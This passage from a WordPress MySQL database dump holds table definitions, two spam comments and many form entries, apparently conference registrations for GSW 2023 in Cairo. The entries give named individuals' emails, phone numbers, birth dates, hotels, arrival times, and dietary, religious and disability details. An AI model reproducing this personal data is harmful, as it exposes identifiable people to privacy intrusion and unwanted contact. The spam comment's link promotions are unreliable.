  `ios_bulk_sent` int(11) DEFAULT 0,
  `ios_sent` int(11) DEFAULT 0,
  `ios_notRegistered` int(11) DEFAULT 0,
  `bulk_sent` int(11) DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_androapp_stats`
--

LOCK TABLES `dnctiavkr_androapp_stats` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_androapp_stats` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_androapp_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_commentmeta`
--

DROP TABLE IF EXISTS `dnctiavkr_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=1121 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_commentmeta`
--

LOCK TABLES `dnctiavkr_commentmeta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_comments`
--

DROP TABLE IF EXISTS `dnctiavkr_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=563 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_comments`
--

LOCK TABLES `dnctiavkr_comments` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_comments` DISABLE KEYS */;
INSERT INTO `dnctiavkr_comments` VALUES
(561,2972,'online','tuyetballinger@hotmail.co.uk','https://trm.pens.ac.id','61.5.36.183','2023-09-19 02:13:26','2023-09-19 02:13:26','Hi, after reading this amazing paragraph i am also delighted to share my know-how here with mates.',0,'0','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51','comment',0,0),
(562,2972,'boom makeup','loulower@mail.ru','http://domain.com','23.95.99.115','2023-10-05 17:56:10','2023-10-05 17:56:10','Hello.\r\nYou have created a website, but it is not attractive to visitors.\r\n\r\nMaybe you need help?\r\nTo get started, you need a good template. Templates can be \r\nfound here – https://assist-hub.com/wordpress-themes\r\nHelp with setting up WordPress, writing content for the site, and SEO can be found here – https://assist-hub.com/fiverr\r\nPlugins will help you quickly set up your site, they can be found here – https://assist-hub.com/wordpress-plugins\r\nHigh-quality images give your site a heartfelt touch, making \r\nit unforgettable. You can find them here – https://assist-hub.com/stock-images\r\nThis will help you start earning faster with the help of \r\nthese sites.',0,'0','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36','comment',0,0);
/*!40000 ALTER TABLE `dnctiavkr_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_db7_forms`
--

DROP TABLE IF EXISTS `dnctiavkr_db7_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_db7_forms` (
  `form_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `form_post_id` bigint(20) NOT NULL,
  `form_value` longtext NOT NULL,
  `form_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`form_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_db7_forms`
--

LOCK TABLES `dnctiavkr_db7_forms` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_db7_forms` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_db7_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_e_events`
--

DROP TABLE IF EXISTS `dnctiavkr_e_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_e_events` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `event_data` text DEFAULT NULL,
  `created_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `created_at_index` (`created_at`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_e_events`
--

LOCK TABLES `dnctiavkr_e_events` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_e_events` DISABLE KEYS */;
INSERT INTO `dnctiavkr_e_events` VALUES
(1,'{\"event\":\"modal load\",\"version\":\"\",\"details\":\"{\\\"placement\\\":\\\"Onboarding wizard\\\",\\\"step\\\":\\\"account\\\",\\\"user_state\\\":\\\"anon\\\"}\",\"ts\":\"2022-10-03T23:36:44.924-02:00\"}','2022-10-03 23:36:44'),
(2,'{\"event\":\"modal load\",\"version\":\"\",\"details\":\"{\\\"placement\\\":\\\"Onboarding wizard\\\",\\\"step\\\":\\\"account\\\",\\\"user_state\\\":\\\"anon\\\"}\",\"ts\":\"2022-10-03T23:36:48.481-02:00\"}','2022-10-03 23:36:48');
/*!40000 ALTER TABLE `dnctiavkr_e_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_fbv`
--

DROP TABLE IF EXISTS `dnctiavkr_fbv`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_fbv` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(250) NOT NULL,
  `parent` int(11) NOT NULL DEFAULT 0,
  `type` int(2) NOT NULL DEFAULT 0,
  `ord` int(11) DEFAULT 0,
  `created_by` int(11) DEFAULT 0,
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_fbv`
--

LOCK TABLES `dnctiavkr_fbv` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_fbv` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_fbv` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_fbv_attachment_folder`
--

DROP TABLE IF EXISTS `dnctiavkr_fbv_attachment_folder`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_fbv_attachment_folder` (
  `folder_id` int(11) unsigned NOT NULL,
  `attachment_id` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`folder_id`,`attachment_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_fbv_attachment_folder`
--

LOCK TABLES `dnctiavkr_fbv_attachment_folder` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_fbv_attachment_folder` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_fbv_attachment_folder` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_ff_scheduled_actions`
--

DROP TABLE IF EXISTS `dnctiavkr_ff_scheduled_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_ff_scheduled_actions` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `action` varchar(255) DEFAULT NULL,
  `form_id` bigint(20) unsigned DEFAULT NULL,
  `origin_id` bigint(20) unsigned DEFAULT NULL,
  `feed_id` bigint(20) unsigned DEFAULT NULL,
  `type` varchar(255) DEFAULT 'submission_action',
  `status` varchar(255) DEFAULT NULL,
  `data` longtext DEFAULT NULL,
  `note` tinytext DEFAULT NULL,
  `retry_count` int(10) unsigned DEFAULT 0,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_ff_scheduled_actions`
--

LOCK TABLES `dnctiavkr_ff_scheduled_actions` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_ff_scheduled_actions` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_ff_scheduled_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_fluentform_entry_details`
--

DROP TABLE IF EXISTS `dnctiavkr_fluentform_entry_details`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_fluentform_entry_details` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) unsigned DEFAULT NULL,
  `submission_id` bigint(20) unsigned DEFAULT NULL,
  `field_name` varchar(255) DEFAULT NULL,
  `sub_field_name` varchar(255) DEFAULT NULL,
  `field_value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1080 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_fluentform_entry_details`
--

LOCK TABLES `dnctiavkr_fluentform_entry_details` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_fluentform_entry_details` DISABLE KEYS */;
INSERT INTO `dnctiavkr_fluentform_entry_details` VALUES
(1,1,1,'input_radio','','Prof.'),
(2,1,1,'names','first_name','ayman'),
(3,1,1,'names','last_name','elzagh'),
(4,1,1,'subject','','egyptian'),
(5,1,1,'subject_2','','AASTMT'),
(6,1,1,'numeric-field','','1256'),
(7,1,1,'email','','ay.zaghweb@gmail.com'),
(8,1,1,'subject_1','','kdsmcvk fjjfdnf fne'),
(9,1,1,'Check_in_Date','','23/08/2023'),
(10,1,1,'message','','cnvkfnkgfmgkm krktkr'),
(11,1,2,'input_radio','','Dr.'),
(12,1,2,'names','first_name','Tri'),
(13,1,2,'names','last_name','Atmaja'),
(14,1,2,'country-list','','ID'),
(15,1,2,'subject_2','','The University of Tokyo'),
(16,1,2,'input_text','','+07075861938'),
(17,1,2,'email','','atmaja@env.t.u-tokyo.ac.jp'),
(18,1,2,'numeric-field','','1771'),
(19,1,2,'subject_1','','Flamenco Cairo Hotel'),
(20,1,2,'Check_in_Date','','01/09/2023'),
(21,1,2,'description','','Must be halal\r\nGrilled seafood'),
(22,1,3,'input_radio','','Prof.'),
(23,1,3,'names','first_name','Junichi'),
(24,1,3,'names','last_name','Susaki'),
(25,1,3,'country-list','','JP'),
(26,1,3,'subject_2','','Kyoto University'),
(27,1,3,'input_text','','81-80-6160-4978'),
(28,1,3,'email','','susaki0@gmail.com'),
(29,1,3,'numeric-field','','1036'),
(30,1,3,'subject_1','','Atlas International Hotels:'),
(31,1,3,'Check_in_Date','','01/09/2023'),
(32,1,3,'description','','Nothing'),
(33,1,3,'message','','Thank you for such service.'),
(34,1,4,'input_radio','','Ms.'),
(35,1,4,'names','first_name','Binbin'),
(36,1,4,'names','last_name','Xiang'),
(37,1,4,'country-list','','CN'),
(38,1,4,'subject_2','','ETH Zurich'),
(39,1,4,'input_text','','+41766334715'),
(40,1,4,'email','','binbinxiang1994@gmail.com'),
(41,1,4,'numeric-field','','173'),
(42,1,4,'subject_1','','Ramses Hilton'),
(43,1,4,'Check_in_Date','','01/09/2023'),
(44,1,5,'input_radio','','Dr.'),
(45,1,5,'names','first_name','Yingwei'),
(46,1,5,'names','last_name','Yan'),
(47,1,5,'country-list','','CN'),
(48,1,5,'subject_2','','National University of Singapore'),
(49,1,5,'input_text','','+65 84383178'),
(50,1,5,'email','','yingwei.yan@nus.edu.sg'),
(51,1,5,'numeric-field','','1043'),
(52,1,5,'subject_1','','Ramses Hilton ,1115 Corniche El Nile Cairo EG'),
(53,1,5,'Check_in_Date','','02/09/2023'),
(54,1,6,'input_radio','','Prof.'),
(55,1,6,'names','first_name','Xin'),
(56,1,6,'names','last_name','Wang'),
(57,1,6,'country-list','','CN'),
(58,1,6,'subject_2','','Wuhan University'),
(59,1,6,'input_text','','+86 18694047134'),
(60,1,6,'email','','xwang@sgg.whu.edu.cn'),
(61,1,6,'numeric-field','','1366'),
(62,1,6,'subject_1','','Ramses Hilton Hotel'),
(63,1,6,'Check_in_Date','','01/09/2023'),
(64,1,7,'input_radio','','Dr.'),
(65,1,7,'names','first_name','Shuhang'),
(66,1,7,'names','last_name','Zhang'),
(67,1,7,'country-list','','CN'),
(68,1,7,'subject_2','','Sun Yat-sen University'),
(69,1,7,'input_text','','+86 18801790491'),
(70,1,7,'email','','zhangsh52@mail.sysu.edu.cn'),
(71,1,7,'numeric-field','','1367'),
(72,1,7,'subject_1','','Grand Nile Tower Hotel'),
(73,1,7,'Check_in_Date','','01/09/2023'),
(74,1,8,'input_radio','','Dr.'),
(75,1,8,'names','first_name','Tao'),
(76,1,8,'names','last_name','Li'),
(77,1,8,'country-list','','CN'),
(78,1,8,'subject_2','','Land Satellite Remote Sensing Application Center'),
(79,1,8,'input_text','','+86-18611375841'),
(80,1,8,'email','','rs_litao@163.com'),
(81,1,8,'numeric-field','','1480'),
(82,1,8,'subject_1','','Ramses Hotel'),
(83,1,8,'Check_in_Date','','02/09/2023'),
(84,1,8,'datetime','','07/09/1986'),
(85,1,9,'input_radio','','Dr.'),
(86,1,9,'names','first_name','Stefano'),
(87,1,9,'names','last_name','Conversi'),
(88,1,9,'country-list','','IT'),
(89,1,9,'subject_2','','Politecnico di Milano'),
(90,1,9,'input_text','','+393342021935'),
(91,1,9,'email','','stefano.conversi@polimi.it'),
(92,1,9,'numeric-field','','1507'),
(93,1,9,'subject_1','','Cleopatra Hotel'),
(94,1,9,'Check_in_Date','','02/09/2023'),
(95,1,9,'description','','No restrictions'),
(96,1,9,'message','','I am a wheelchair user, so I would need a transportation mean capable of carrying wheelchairs, for the travels between the hotel and the conference venue.'),
(97,1,9,'datetime','','06/01/1997'),
(98,1,10,'input_radio','','Prof.'),
(99,1,10,'names','first_name','Zhenyang'),
(100,1,10,'names','last_name','Hui'),
(101,1,10,'country-list','','CN'),
(102,1,10,'subject_2','','East China University of Technology'),
(103,1,10,'input_text','','+86-18202761978'),
(104,1,10,'email','','huizhenyang2008@ecut.edu.cn'),
(105,1,10,'numeric-field','','509'),
(106,1,10,'subject_1','','Flamenco Cairo Hotel'),
(107,1,10,'Check_in_Date','','01/09/2023'),
(108,1,10,'description','','beef'),
(109,1,11,'input_radio','','Mr.'),
(110,1,11,'names','first_name','Yanyi'),
(111,1,11,'names','last_name','Li'),
(112,1,11,'country-list','','CN'),
(113,1,11,'subject_2','','Tongji University, Shanghai, China.'),
(114,1,11,'input_text','','+86 15163359112'),
(115,1,11,'email','','liyanyi19981104@163.com'),
(116,1,11,'numeric-field','','1301'),
(117,1,11,'subject_1','','InterContinental: Cairo Semiramis'),
(118,1,11,'Check_in_Date','','01/09/2023'),
(119,1,11,'description','','Beef and chicken, as well as fresh fruits and green vegetables.'),
(120,1,12,'input_radio','','Dr.'),
(121,1,12,'names','first_name','Franz'),
(122,1,12,'names','last_name','Rottensteiner'),
(123,1,12,'country-list','','DE'),
(124,1,12,'subject_2','','Leibniz University Hannover'),
(125,1,12,'input_text','','+4915121713943'),
(126,1,12,'email','','rottensteiner@ipi.uni-hannover.de'),
(127,1,12,'numeric-field','','000104'),
(128,1,12,'subject_1','','Novotel El Borg'),
(129,1,12,'Check_in_Date','','31/08/2023'),
(130,1,12,'message','','Transport from my hotel to the venue is required only from Sept 3-7.'),
(131,1,13,'input_radio','','Mr.'),
(132,1,13,'names','first_name','Jayanth'),
(133,1,13,'names','last_name','Siddamsetty'),
(134,1,13,'country-list','','IN'),
(135,1,13,'subject_2','','DFKI GmbH'),
(136,1,13,'input_text','','+4915215235001'),
(137,1,13,'email','','jsiddamsetty@gmail.com'),
(138,1,13,'numeric-field','','1030'),
(139,1,13,'subject_1','','Ramses Hilton Hotel'),
(140,1,13,'Check_in_Date','','01/09/2023'),
(141,1,13,'description','','Vegetarian'),
(142,1,13,'message','','Resident of Germany\r\nRegistration ID: T000165'),
(143,1,14,'input_radio','','Mr.'),
(144,1,14,'names','first_name','Jojene'),
(145,1,14,'names','last_name','Santillan'),
(146,1,14,'country-list','','PH'),
(147,1,14,'subject_2','','Leibniz University Hannover'),
(148,1,14,'input_text','','+639770234959'),
(149,1,14,'email','','jrsantillan@carsu.edu.ph'),
(150,1,14,'numeric-field','','1693'),
(151,1,14,'subject_1','','Ramses Hilton Hotel'),
(152,1,14,'Check_in_Date','','01/09/2023'),
(153,1,14,'message','','Dear GSW 2023, I wish to avail the daily transportation from hotel to conference venue. Thank you.'),
(154,1,15,'input_radio','','Ms.'),
(155,1,15,'names','first_name','Galina'),
(156,1,15,'names','last_name','Kirichenko'),
(157,1,15,'country-list','','RU'),
(158,1,15,'subject_2','','Rosreestr'),
(159,1,15,'input_text','','+79091608012'),
(160,1,15,'email','','gala_k2002@mail.ru'),
(161,1,15,'numeric-field','','2104'),
(162,1,15,'subject_1','','Novotel Cairo El-Borg'),
(163,1,15,'Check_in_Date','','02/09/2023'),
(164,1,16,'input_radio','','Mr.'),
(165,1,16,'names','first_name','Dmitrii'),
(166,1,16,'names','last_name','Kozeev'),
(167,1,16,'country-list','','RU'),
(168,1,16,'subject_2','','Rosreestr'),
(169,1,16,'input_text','','+79091608012'),
(170,1,16,'email','','kozeev_d@inbox.ru'),
(171,1,16,'numeric-field','','2102'),
(172,1,16,'subject_1','','Novotel Cairo El-Borg'),
(173,1,16,'Check_in_Date','','02/09/2023'),
(174,1,17,'input_radio','','Dr.'),
(175,1,17,'names','first_name','Francesca'),
(176,1,17,'names','last_name','Trevisiol'),
(177,1,17,'country-list','','IT'),
(178,1,17,'subject_2','','University of Bologna'),
(179,1,17,'input_text','','+393349534634'),
(180,1,17,'email','','francesca.trevisiol2@unibo.it'),
(181,1,17,'numeric-field','','1592'),
(182,1,17,'subject_1','','Novotel Cairo El Borg'),
(183,1,17,'Check_in_Date','','02/09/2023'),
(184,1,18,'input_radio','','Dr.'),
(185,1,18,'names','first_name','Patrick'),
(186,1,18,'names','last_name','Hübner'),
(187,1,18,'country-list','','DE'),
(188,1,18,'subject_2','','TU Darmstadt, Remote Sensing and Image Analysis'),
(189,1,18,'input_text','','004917636372378'),
(190,1,18,'email','','patrick.huebner@tu-darmstadt.de'),
(191,1,18,'numeric-field','','1228'),
(192,1,18,'subject_1','','Hilton Ramses'),
(193,1,18,'Check_in_Date','','02/09/2023'),
(194,1,18,'datetime','','07/12/1988'),
(195,1,19,'input_radio','','Dr.'),
(196,1,19,'names','first_name','Lucía'),
(197,1,19,'names','last_name','Díaz Vilariño'),
(198,1,19,'country-list','','ES'),
(199,1,19,'subject_2','','Universidade de Vigo'),
(200,1,19,'input_text','','+34618238987'),
(201,1,19,'email','','lucia@uvigo.gal'),
(202,1,19,'numeric-field','','1068'),
(203,1,19,'subject_1','','Golden Tulip Flamenco Cairo Hotel'),
(204,1,19,'Check_in_Date','','01/09/2023'),
(205,1,19,'description','','Fish, vegetarian'),
(206,1,20,'input_radio','','Dr.'),
(207,1,20,'names','first_name','Tao'),
(208,1,20,'names','last_name','Zhang'),
(209,1,20,'country-list','','CN'),
(210,1,20,'subject_2','','Land Satellite Remote Sensing Application Center, MNR'),
(211,1,20,'input_text','','+8615120098709'),
(212,1,20,'email','','zhangtaosas@qq.com'),
(213,1,20,'numeric-field','','2061'),
(214,1,20,'subject_1','','Ramses Hilton Hotel'),
(215,1,20,'Check_in_Date','','02/09/2023'),
(216,1,21,'input_radio','','Prof.'),
(217,1,21,'names','first_name','Kamal'),
(218,1,21,'names','last_name','Labbassi'),
(219,1,21,'country-list','','MA'),
(220,1,21,'subject_2','','AARSE'),
(221,1,21,'input_text','','00212640341542'),
(222,1,21,'email','','labbassi@ucd.ac.ma'),
(223,1,21,'numeric-field','','2242'),
(224,1,21,'subject_1','','Steigenberger Hotel'),
(225,1,21,'Check_in_Date','','01/08/2023'),
(226,1,21,'description','','Muslim'),
(227,1,22,'input_radio','','Mr.'),
(228,1,22,'country-list','','IT'),
(229,1,22,'subject_2','','Università Politecnica Delle Marche'),
(230,1,22,'input_text','','3348468112'),
(231,1,22,'email','','m.balestra@pm.univpm.it'),
(232,1,22,'numeric-field','','2093'),
(233,1,22,'subject_1','','Steigenberger Hotel El Tahrir Cairo'),
(234,1,22,'Check_in_Date','','02/09/2023'),
(235,1,23,'input_radio','','Prof.'),
(236,1,23,'names','first_name','Toshihiro'),
(237,1,23,'names','last_name','Osaragi'),
(238,1,23,'country-list','','JP'),
(239,1,23,'subject_2','','Tokyo Institute of Technology'),
(240,1,23,'input_text','','+817064603162'),
(241,1,23,'email','','osaragi.t.aa@m.titech.ac.jp'),
(242,1,23,'numeric-field','','1145'),
(243,1,23,'subject_1','','Ramses Hilton hotel'),
(244,1,23,'Check_in_Date','','04/09/2023'),
(245,1,24,'input_radio','','Dr.'),
(246,1,24,'names','first_name','Sonali'),
(247,1,24,'names','last_name','Patil'),
(248,1,24,'country-list','','IN'),
(249,1,24,'subject_2','','German Aerospace Center (DLR)'),
(250,1,24,'input_text','','+4915168485419'),
(251,1,24,'email','','sonali.patil@dlr.de'),
(252,1,24,'numeric-field','','1787'),
(253,1,24,'subject_1','','Intercontinental Hotels'),
(254,1,24,'Check_in_Date','','01/09/2023'),
(255,1,24,'description','','Vegetarian'),
(256,1,25,'input_radio','','Prof.'),
(257,1,25,'names','first_name','Kohei'),
(258,1,25,'names','last_name','Cho'),
(259,1,25,'country-list','','JP'),
(260,1,25,'subject_2','','Tokai Univeristy'),
(261,1,25,'input_text','','+8190-2527-3015'),
(262,1,25,'email','','kohei.cho@tokai-u.jp'),
(263,1,25,'numeric-field','','1603'),
(264,1,25,'subject_1','','Intercontinental Cairo Semiramis'),
(265,1,25,'Check_in_Date','','03/09/2023'),
(266,1,25,'description','','Any food'),
(267,1,25,'datetime','','16/09/1955'),
(268,1,26,'input_radio','','Prof.'),
(269,1,26,'names','first_name','Kourosh'),
(270,1,26,'names','last_name','Khoshelham'),
(271,1,26,'country-list','','AU'),
(272,1,26,'subject_2','','University of Melbourne'),
(273,1,26,'input_text','','0061451038600'),
(274,1,26,'email','','k.khoshelham@unimelb.edu.au'),
(275,1,26,'numeric-field','','1090'),
(276,1,26,'subject_1','','INTERCONTINENTAL CAIRO SEMIRAMIS'),
(277,1,26,'Check_in_Date','','02/09/2023'),
(278,1,27,'input_radio','','Prof.'),
(279,1,27,'names','first_name','Tudor'),
(280,1,27,'names','last_name','Barbu'),
(281,1,27,'country-list','','RO'),
(282,1,27,'subject_2','','Institute of Computer Science of the Romanian Academy - Iasi Branch'),
(283,1,27,'input_text','','+40787866198'),
(284,1,27,'email','','tudor.barbu@iit.academiaromana-is.ro'),
(285,1,27,'numeric-field','','1039'),
(286,1,27,'subject_1','','Miramar Evergreen Hotel'),
(287,1,27,'Check_in_Date','','01/09/2023'),
(288,1,27,'message','','I will arrive on Cairo airport on September 1, early morning, at 3.30 a.m. I need a shuttle to my hotel.\r\n\r\nThank you,\r\n\r\nDr. habil. Tudor Barbu'),
(289,1,27,'datetime','','27/11/1973'),
(290,1,28,'input_radio','','Dr.'),
(291,1,28,'names','first_name','Davide Antonio'),
(292,1,28,'names','last_name','Cucci'),
(293,1,28,'country-list','','IT'),
(294,1,28,'subject_2','','Pix4D'),
(295,1,28,'input_text','','+41768189540'),
(296,1,28,'email','','davide.cucci@pix4d.com'),
(297,1,28,'numeric-field','','2167'),
(298,1,28,'subject_1','','Ramses Hilton'),
(299,1,28,'Check_in_Date','','02/09/2023'),
(300,1,28,'datetime','','12/08/2023'),
(301,1,29,'input_radio','','Eng.'),
(302,1,29,'names','first_name','NABILA'),
(303,1,29,'names','last_name','RAMADAN'),
(304,1,29,'country-list','','EG'),
(305,1,29,'subject_2','','GENERAL manager'),
(306,1,29,'input_text','','01207352846'),
(307,1,29,'email','','nabilaramdan959@gmail.com'),
(308,1,29,'numeric-field','','1511'),
(309,1,29,'subject_1','','CAIRO'),
(310,1,29,'Check_in_Date','','10/08/2023'),
(311,1,29,'description','','Health'),
(312,1,29,'message','','Good luck'),
(313,1,29,'datetime','','15/11/2023'),
(314,1,30,'input_radio','','Miss.'),
(315,1,30,'names','first_name','Federica'),
(316,1,30,'names','last_name','Gaspari'),
(317,1,30,'country-list','','IT'),
(318,1,30,'subject_2','','Politecnico di Milano'),
(319,1,30,'input_text','','+393311060222'),
(320,1,30,'email','','federica.gaspari@polimi.it'),
(321,1,30,'numeric-field','','355'),
(322,1,30,'subject_1','','Cleopatra Hotel'),
(323,1,30,'Check_in_Date','','01/09/2023'),
(324,1,31,'input_radio','','Mr.'),
(325,1,31,'names','first_name','Paul'),
(326,1,31,'names','last_name','Debus'),
(327,1,31,'country-list','','DE'),
(328,1,31,'subject_2','','Bauhaus-Universität Weimar'),
(329,1,31,'input_text','','+4915735156325'),
(330,1,31,'email','','paul.debus@uni-weimar.de'),
(331,1,31,'numeric-field','','799'),
(332,1,31,'subject_1','','Golden Tulip Hotel Flamenco'),
(333,1,31,'Check_in_Date','','02/09/2023'),
(334,1,31,'description','','Vegetarian'),
(335,1,32,'input_radio','','Mr.'),
(336,1,32,'names','first_name','Julius'),
(337,1,32,'names','last_name','Knechtel'),
(338,1,32,'country-list','','DE'),
(339,1,32,'subject_2','','University of Bonn'),
(340,1,32,'input_text','','+49228731759'),
(341,1,32,'email','','knechtel@igg.uni-bonn.de'),
(342,1,32,'numeric-field','','1494'),
(343,1,32,'subject_1','','Steigenberger El Tahrir'),
(344,1,32,'Check_in_Date','','02/09/2023'),
(345,1,33,'input_radio','','Prof.'),
(346,1,33,'names','first_name','Daniele'),
(347,1,33,'names','last_name','Alves'),
(348,1,33,'country-list','','BR'),
(349,1,33,'subject_2','','São Paulo State University'),
(350,1,33,'input_text','','55 18 996057369'),
(351,1,33,'email','','daniele.barroca@unesp.br'),
(352,1,33,'numeric-field','','1565'),
(353,1,33,'subject_1','','Hilton Ramses'),
(354,1,33,'Check_in_Date','','01/09/2023'),
(355,1,33,'description','','salad\r\nchicken\r\nfish\r\nfruit'),
(356,1,34,'input_radio','','Ms.'),
(357,1,34,'names','first_name','Aline Barroca'),
(358,1,34,'names','last_name','Marra'),
(359,1,34,'country-list','','BR'),
(360,1,34,'subject_2','','São Paulo State University (Unesp)'),
(361,1,34,'input_text','','+39 351 3509260'),
(362,1,34,'email','','aline.barroca@unesp.br'),
(363,1,34,'numeric-field','','000576'),
(364,1,34,'subject_1','','Ramses Hilton'),
(365,1,34,'Check_in_Date','','01/09/2023'),
(366,1,35,'input_radio','','Miss.'),
(367,1,35,'names','first_name','Hsuan-Yi'),
(368,1,35,'names','last_name','Li'),
(369,1,35,'country-list','','TW'),
(370,1,35,'subject_2','','Imperial College London'),
(371,1,35,'input_text','','+447467328002'),
(372,1,35,'email','','hsuan-yi.li22@imperial.ac.uk'),
(373,1,35,'numeric-field','','1813'),
(374,1,35,'subject_1','','Hathor House'),
(375,1,35,'Check_in_Date','','01/09/2023'),
(376,1,36,'input_radio','','Miss.'),
